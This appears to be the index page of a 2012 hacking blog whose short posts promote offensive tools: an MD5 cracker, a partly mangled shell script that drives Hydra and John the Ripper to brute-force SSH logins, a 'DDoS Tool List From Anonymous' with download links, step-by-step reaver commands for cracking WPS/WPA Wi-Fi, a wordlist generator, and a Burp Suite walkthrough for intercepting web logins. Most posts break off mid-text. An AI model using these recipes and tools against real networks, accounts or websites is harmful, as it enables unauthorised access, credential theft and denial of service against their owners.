Showing posts with label Brute Force Tool. Show all posts
Showing posts with label Brute Force Tool. Show all posts

Sunday, 10 June 2012

iCrack Online/Offline MD5 Cracker [Python Script]

Cool scripts written in python , iCrack is an Online/ofline md5 cracker script in Python. Currently containes about 14 db for online cracking.

Download Link:: https://code.google.com/p/lnxg33k/downloads/detail?name=icrack.py


Source: http://tools.thehackernews.com/2012/06/icrack-python-md5-online-offline.html

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00

Sunday, 27 May 2012

THC-Hydra password bruteforcing with john the ripper - http://funoverip.net

#!/bin/shhydra="/usr/local/bin/hydra"john="/usr/bin/john"hydra_module="ssh2"hydra_host="127.0.0.1"hydra_port="22"hydra_nb_task="10"hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "john_sessionfile="$1"john_all_params="--incremental:Alpha --stdout"john_time_step=20   # time (seconds) to run johntmp_passwd="/tmp/pwd1234.tmp"hydra_logfile="/tmp/hydralog"if [ "$1" = "" ];then    echo "

Monday, 21 May 2012

วิธีการทดสอบเจาะระบบเว็บไซด์ที่ใช้ CMS ชื่อดัง

ดูตัวเต็มได้จาก link download ข้างล่างครับ



วิธีการทดสอบเจาะระบบเว็บไซด์ที่ใช้ CMS ชื่อดัง

โดยสุเมธ
จิตภักดีบดินทร์

          ในปัจจุบัน, เว็บไซด์เกิดใหม่ทุกๆ
นาที เพราะเหตุผลที่ว่าไม่ว่าใครก็สามารถที่จะเป็นเจ้าของเว็บไซด์ได้อย่างง่ายดาย แต่สิ่งที่เราจะเห็นๆกันอยู่ก็คือ
website ส่วนใหญ่มักจะหน้าตาหรือโครงสร้างของเว็บคล้ายๆกัน
ต่างกันแค่สีสันหรือโลโก้ของเว็บเท่านั้น

Wednesday, 28 March 2012

Johnny - GUI for John the Ripper


Johnny is a GUI for John the Ripper. It was proposed by Shinnok. You could look onto original version on John the Ripper GUI sketches page.  


You could download and unpack tarball or use git:  git clone https://github.com/AlekseyCherepanov/johnny.git -b release1Then build and run (no installation required):  cd johnny  qmake  make && ./johnny


Source: http://openwall.info/wiki/john/johnny#

Sunday, 26 February 2012

DDoS Tool List From Anonymous


DDOS TOOLS LIST!

 

DDoSim (Linux) - Download => http://tinyurl.com/4xe3vjk

Loris - Download => http://ha.ckers.org/slowloris/

Apachekiller - Download =>
http://pastebin.com/9y9Atijn save as "whatever.pl" <-- More
Infohttp://thehackernews.com/2011/08/killapache-ddos-tool-half-of-internet.html

perl for windows => http://www.activestate.com/activeperl/downloads

pyloris => http://

Thursday, 19 January 2012

Howto: Crack WPS & WPA Wifi with reaver

1. Get the reaver
- wget https://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

2. Extract and compile it.
- tar xzvf reaver-1.3.tar.gz
- cd reaver-1.3/src
- ./configure
- make
- make install

3. Change your wireless card to monitor mode
- airmon-ng start wlan0

4. Use reaver
- reaver -i mon0 -b

5. Waiting beacon from Wireless Access Point and finally you

Wednesday, 11 January 2012

Word List Generator

wlg: Word List Generator
version: 0.5
coded by white_sheep

site: http://www.marcorondini.eu - http://www.ihteam.net
twitter: http://www.twitter.com/white__sheep
 
Option
-h [ --help ] produce help message
-v [ --version ] show version
-r [ --credits ] show credits

-e [ --extract ] arg set string to extract

Sunday, 8 January 2012

Howto: Hacking web authentication with Bursuite

1. Set the browser proxy to Burpsuite

2. In the Burpsuite, go to Proxy -> Intercept -> "Intercept is on"


3. Go to Proxy -> Option -> "generate CA-signed per-host certificates" for each time the user connects to a SSL protected website, Burpsuite will
generate a server certificate for that host, signed by a unique CA
certificate which is generated in Burpsuite during its installation. The

Friday, 30 December 2011